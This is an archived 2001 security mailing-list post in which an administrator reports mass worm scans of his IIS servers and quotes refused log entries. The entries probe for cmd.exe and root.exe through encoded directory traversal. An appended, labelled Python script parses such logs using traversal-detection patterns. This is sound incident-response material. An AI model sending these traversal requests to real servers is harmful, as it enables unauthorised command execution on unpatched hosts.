massive cmd.exe and root.exe attempts

From: Patrick Beam (pbeam@agea.com)
Date: 09/18/01


From: "Patrick Beam" <pbeam@agea.com>
To: <incidents@securityfocus.com>
Subject: massive cmd.exe and root.exe attempts
Date: Tue, 18 Sep 2001 12:05:55 -0500
Message-ID: <000801c14064$2e33ab90$958e36d8@ageacorp.net>

I am as well being hit by this worm. Everything seems to be coming from
the same class A 64.*. I have already seen 1500 plus scans to my web
servers and that number is climbing rather fast. This seemed to
suddenly pop up with little or no warning? In the past days I have seen
a few scans here and there but nothing of this magnitude. I am wondering
what suddenly changed to cause this type of outbreak?

2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/MSADC/root.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/root.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/MSADC/root.exe /c+dir 403 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -

Patrick Beam
Senior Systems Administrator
Agea Corp.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
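Added example (not from the post or the list): a small Python triage script for IIS W3C log lines like the ones quoted above. It flags requests for cmd.exe or root.exe, notes which traversal encoding was used (%5c, %2f, or the overlong UTF-8 sequence that IIS logs decoded as "Á"), counts hits per source address, and separates rejected attempts (401/403, as in the post) from any the server actually answered with 2xx. The sample lines, the 10.0.0.5 server address and the single 200 response are constructed.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the IIS W3C extended format used in the post:
# date time c-ip - s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status -
# The "Á" is how IIS wrote the decoded %c1%1c overlong-UTF-8 sequence.
SAMPLE_LOG = """\
2001-09-18 13:26:03 64.132.124.14 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - 10.0.0.5 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - 10.0.0.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - 10.0.0.5 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:31:36 64.132.86.157 - 10.0.0.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:32:00 192.0.2.7 - 10.0.0.5 80 GET /index.html - 200 -
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<client>\S+) - (?P<server>\S+) (?P<port>\d+) "
    r"(?P<method>\S+) (?P<uri>\S+) (?P<query>\S+) (?P<status>\d{3}) ")

# Traversal encodings seen in the post: percent-encoded backslash/slash and
# the overlong UTF-8 forms, which IIS logs either encoded or decoded ("Á").
TRAVERSAL_RE = re.compile(r"\.\.(%5c|%2f|%c0%af|%c1%1c|%c1%9c|Á)", re.IGNORECASE)
TARGET_RE = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)

def classify(line):
    """Return (client_ip, status, reason) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    if not TARGET_RE.search(uri):
        return None
    reason = "traversal" if TRAVERSAL_RE.search(uri) else "direct"
    return m.group("client"), int(m.group("status")), reason

def summarize(log_text):
    """Count flagged requests per source IP; collect those answered 2xx."""
    per_ip = Counter()
    succeeded = defaultdict(list)   # only these need host-level follow-up
    for line in log_text.splitlines():
        hit = classify(line)
        if hit is None:
            continue
        ip, status, reason = hit
        per_ip[ip] += 1
        if 200 <= status < 300:
            succeeded[ip].append(line)
    return per_ip, dict(succeeded)
```

A 401 or 403 on these requests means the server refused them; a 2xx on a cmd.exe or root.exe request is the line that warrants pulling the host for investigation.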
